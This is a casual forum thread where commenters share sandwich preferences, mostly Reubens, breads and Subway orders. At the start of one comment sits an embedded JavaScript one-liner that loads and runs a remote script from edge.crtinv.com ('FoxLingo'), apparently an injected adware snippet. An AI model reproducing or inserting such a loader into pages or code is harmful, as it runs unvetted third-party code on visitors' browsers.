Good morning, friends! Most of us have already made our lunch for work, or at least we've thought about what we are going to have, or maybe some of us have already eaten lunch, which makes me wonder...

Do you like sandwiches? Are they all pretty good (or pretty bad) or do you have certain requirements for your sandwiches?

I'm not a big fan of sandwiches (or food in general) but will eat one if the bread is super-soft and not chewy, it can't have meat and cheese (just one of those and just one slice), a little bit of fresh mayo, and I'll eat it with potato chips or carrot sticks. I'm more likely to eat it if the crusts are cut off (sounds like I'm 5 years old, lol). That's it, if the sandwich doesn't meet those criteria I will not eat it.

I am not picky when it comes to sandwiches..as long as it's tasty! though if I go to Subway or some place that toasts it, and the bread becomes hard, I won't eat it.

I like sandwiches.  I really like Reuben sandwiches.  I like to use meat, preferably turkey pastrami, swiss or non-smoked provolone cheese, a slice of good tomato, Grey Poupon Country Dijon mustard and a little mayo on french or whole wheat bread.

I love sandwiches. I don't like tomato and onion on my sandwiches, but I do like mayo, pickles and lettuce with meat and cheese. The only deli meat I don't like is roast beef and that's mainly because I find it too fatty.

I love, love, love Reubens! My favorite sandwich of all time. Grey Poupon Country Dijon rocks.

I like sandwiches....period. Love the crustier breads and rolls. Two nice, thick slices of sourdough bread are heaven for me for my sandwich. And I'm pretty much good to go with almost anything.

I love sandwiches -- Reubens, tuna salad, almost anything. Dark bread --- wheat, pumpernickel, etc. I think I could live on sandwiches!

I have never heard of a Reubens sandwich! MY favourite is a half baguette of french bread stuffed with goats cheese, tomato slices and lots of black pepper. Eaten on the terrace or the lawn with a glass of chilled white wine. THAT is what living in France is all about.

I love sandwiches, especially if they're made with whole-grain or rye hard rolls and have lots of lettuce, tomato and pickles along with the meat, cheese or egg. Reubens are great!

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}(); I'm not a huge fan of sandwiches, but they are fast to make and it's what I usually take for lunch. I prefer whole wheat or rye bread.  Because I'm diabetic, I usually have a meat sandwhich. Typically turkey or roast beef, freshly sliced from the deli, with lots of dijon mustard. I also love Subway subs: Veggie, no cheese,  with mustard and black pepper, or the sweet onion chicken one, again, no cheese.

The only other sandwiches that I will eat are chicken salad, tuna salad or egg salad.

Sandwiches are the bomb! Count me in among the reuben fans. They're my favorite too. :D

My dad always finds it funny when we go out to eat and I have a reuben... when I was a kid, I was notoriously picky and often refused to eat anything I didn't want. (My favorite dinner was a plain microwaved hot dog, with little dots of ketchup and mustard for me to dip it in.) But I LOVED sauerkraut, which is odd considering my family doesn't really have German ancestry, so we didn't have it a lot. I also love pickles, olives, and mustard, so I think it's the tangy vinegar flavor that attracts me.

A reuben sandwich is corned beef, swiss cheese, sauerkraut and thousand island dressing on rye bread that is buttered and grilled.  Best served with a kosher dill pickle and some potato chips.

I haven't had a Reuban for so long! It was one of my favourites when I was a teenager into my 20's.  But when I developed lactose intolerance in my 30's, I couldn't eat it anymore because of the cheese and a reuban without the cheese, is not a reuban!

I love sandwiches.  Egg salad, tuna salad, Philly steak, Subway clubs with extra cheese.  I don't eat (visible) fat, so I really pick through sandwiches from restaurants.  I'm not dieting or anything...in nursing school we called it "food preferences".  At my job, they say I'm picky.

The only person to understand the sandwich I will say is Rosiemac.... it has to be a saveloy dip with pease pudding stuffing and dipped or good old ham and pease pudding!  Saveloys are native to the North east of england as is pease pudding really none of that tinned stuff you get down south its not real LOL!!

see another thing is our corned beef is completely different to the US corned beef to

But there is nothing finer than a ham and turkey double cheese with all the salad and ranch sauce subway
